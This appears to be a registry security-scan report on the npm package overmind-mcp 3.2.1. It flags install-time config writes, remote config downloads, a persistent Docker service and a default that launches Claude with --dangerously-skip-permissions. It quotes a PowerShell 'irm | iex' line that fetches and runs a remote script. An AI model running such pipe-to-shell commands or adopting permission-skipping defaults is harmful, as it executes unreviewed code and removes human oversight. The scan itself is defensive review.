registry  /  overmind-mcp  /  3.2.1

overmind-mcp@3.2.1

Orchestrateur universel agents IA multi-modeles via MCP. Inclut le protocole 'Custom-Nickname' pour identifier vos agents avec des surnoms originaux (The Chaos Prophet, Shadow Sniper, etc.), l'isolation mémoire (Private Memory Context) et le support pour

AI Security Review

scanned 6h ago · by lpm-firewall-ai

LPM treats this as warn-only first-party agent extension lifecycle risk. Install lifecycle performs broad setup for an AI/MCP platform, including home-directory MCP config, remote config fetches, global npm install, and a persistent Docker Postgres service. This is risky and consent-sensitive but source evidence points to package-aligned setup rather than confirmed malware.

Static reason
High-risk behavior combination matched malicious policy.; previous stored version diff introduced dangerous source
Trigger
npm install postinstall lifecycle
Impact
Unprompted install-time system mutation and dangerous agent runtime defaults may expand local AI-agent capability surface.
Mechanism
lifecycle-generated first-party MCP/agent environment with persistent Docker service
Policy narrative
On install, the package runs postinstall, creates ~/.overmind config including an MCP config, downloads mutable config files from GitHub, installs overmind-postgres-mcp globally, and starts a restartable pgvector Docker container. Runtime agent execution can invoke Claude with --dangerously-skip-permissions by default, but that path is user-invoked and uses package/workspace config rather than a hidden foreign-agent hijack.
Rationale
Static inspection confirms high-risk lifecycle behavior and agent capability defaults, but not credential harvesting, exfiltration, obfuscated payloads, or unconsented mutation of a foreign/broad agent config outside the package namespace. This fits warn-level agent extension lifecycle risk rather than publish-block malware.
Evidence
package.jsonscripts/postinstall.mjs.mcp.json.exampledist/lib/config.jsdist/services/ClaudeRunner.js~/.overmind/.env.example~/.overmind/.mcp.json.example~/.overmind/.env~/.overmind/.env.postgres~/.overmind/.mcp.jsondocker volume overmind_postgres_data
Network endpoints5
raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.env.exampleraw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.mcp.json.examplelocalhost:3099/mcplocalhost:5433/mcplocalhost:3141/mcp

Decision evidence

public snapshot
AI called this Suspicious at 84.0% confidence as Dangerous Capability with medium false-positive risk.
Evidence for warning
  • package.json runs postinstall: node scripts/postinstall.mjs
  • scripts/postinstall.mjs creates ~/.overmind/.env, .env.postgres, .mcp.json
  • scripts/postinstall.mjs downloads .env.example and .mcp.json.example from raw.githubusercontent.com during install
  • scripts/postinstall.mjs runs docker pull/run with --restart unless-stopped and npm install -g overmind-postgres-mcp
  • dist/lib/config.js defaults Claude permissions to --dangerously-skip-permissions
Evidence against
  • .mcp.json.example only points to localhost MCP URLs, not external C2
  • Writes are under first-party ~/.overmind namespace rather than Claude/Codex/Cursor global config
  • Claude execution and .claude agent files are runtime/user-invoked, not import-time
  • No credential exfiltration endpoint found in inspected source
  • No obfuscated payload, eval/vm, or native binary loading found in reviewed hot files
Behavioral surface
Source
ChildProcessCryptoEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 88 file(s), 799 KB of source, external domains: 127.0.0.1, api.anthropic.com, api.minimax.com, api.minimax.io, api.minimaxi.com, api.telegram.org, api.z.ai, deamondev888.github.io, discord.gg, docs.docker.com, github.com, openrouter.ai, podman.io, raw.githubusercontent.com, www.docker.com, www.npmjs.com, www.trae.ai, www.w3.org

Source & flagged code

9 flagged · loading source
package.jsonView file
scripts.postinstall = node scripts/postinstall.mjs
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node scripts/postinstall.mjs
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
bin/launch.cjsView file
4L5: const { exec, spawn } = require("child_process"); L6: const fs = require("fs");
High
Child Process

Package source references child process execution.

bin/launch.cjsView on unpkg · L4
dist/lib/InstallHelper.jsView file
2import { promisify } from 'util'; L3: const execAsync = promisify(exec); L4: export const CLIS_METADATA = {
High
Shell

Package source references shell execution.

dist/lib/InstallHelper.jsView on unpkg · L2
1import { exec } from 'child_process'; L2: import { promisify } from 'util'; ... L9: installCmd: 'npm install -g @anthropic-ai/claude-code', L10: url: 'https://www.npmjs.com/package/@anthropic-ai/claude-code', L11: }, ... L30: versionCmd: 'hermes --version', L31: installCmd: process.platform === 'win32' L32: ? 'powershell -Command "irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex"' ... L82: try { L83: const { stdout } = await execAsync(meta.versionCmd); L84: const version = stdout.trim();
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

dist/lib/InstallHelper.jsView on unpkg · L1
scripts/postinstall.mjsView file
10Install-time AI-agent control hijack evidence: L10: * - Copie .env.example → .env L11: * - Copie .mcp.json.example → .mcp.json L12: * ═══════════════════════════════════════════════════════════════════════════════ ... L15: import { execSync, spawn } from 'child_process'; L16: import { existsSync, mkdirSync, writeFileSync, readFileSync } from 'fs'; L17: import { join } from 'path'; ... L230: L231: mkdirSync(INSTALL_DIR, { recursive: true }); L232: ... L235: const envExampleUrl = 'https://raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.env.example'; L236: const mcpExampleUrl = 'https://raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.mcp.json.example'; L237: Payload evidence from dist/services/AgentManager.js: L48: const content = await fs.readFile(mcpPath, 'utf-8'); L49: const json = JSON.parse(content); L50: return Object.keys(json.mcpServers || {}); ... L492: // Resolve auth token: prefer ANTHROPIC_AUTH_TOKEN, fallback to any ANTHROPIC_AUTH_TOKEN_<N> L493: let authToken = process.env.ANTHROPIC_AUTH_TOKEN; L494: if (!authToken) { ... L516: ANTHROPIC_AUTH_TOKEN: authToken, L517: ANTHROPIC_BASE_URL: process.env.ANTHROPIC_BASE_URL || 'https://api.anthropic.com',…
Critical
Ai Agent Control Hijack

Install-time source drops package-supplied AI-agent/MCP control files or instructions.

scripts/postinstall.mjsView on unpkg · L10
scripts/setup-windows.jsView file
55try { L56: const nodeVersion = execSync('node --version', { encoding: 'utf8' }).trim(); L57: console.log(`✅ Node.js: ${nodeVersion}`); ... L68: console.error('❌ pnpm non trouvé. Installez pnpm:'); L69: console.error(' npm install -g pnpm'); L70: return false;
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

scripts/setup-windows.jsView on unpkg · L55
bin/test_mcp.batView file
path = bin/test_mcp.bat kind = build_helper sizeBytes = 170 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

bin/test_mcp.batView on unpkg
dist/services/ClaudeRunner.jsView file
matchType = previous_version_dangerous_delta matchedPackage = overmind-mcp@3.2.0 matchedIdentity = npm:b3Zlcm1pbmQtbWNw:3.2.0 similarity = 0.977 summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

dist/services/ClaudeRunner.jsView on unpkg

Findings

2 Critical5 High5 Medium5 Low
CriticalAi Agent Control Hijackscripts/postinstall.mjs
CriticalPrevious Version Dangerous Deltadist/services/ClaudeRunner.js
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processbin/launch.cjs
HighShelldist/lib/InstallHelper.js
HighSandbox Evasion Gated Capabilitydist/lib/InstallHelper.js
HighRuntime Package Installscripts/setup-windows.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helperbin/test_mcp.bat
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings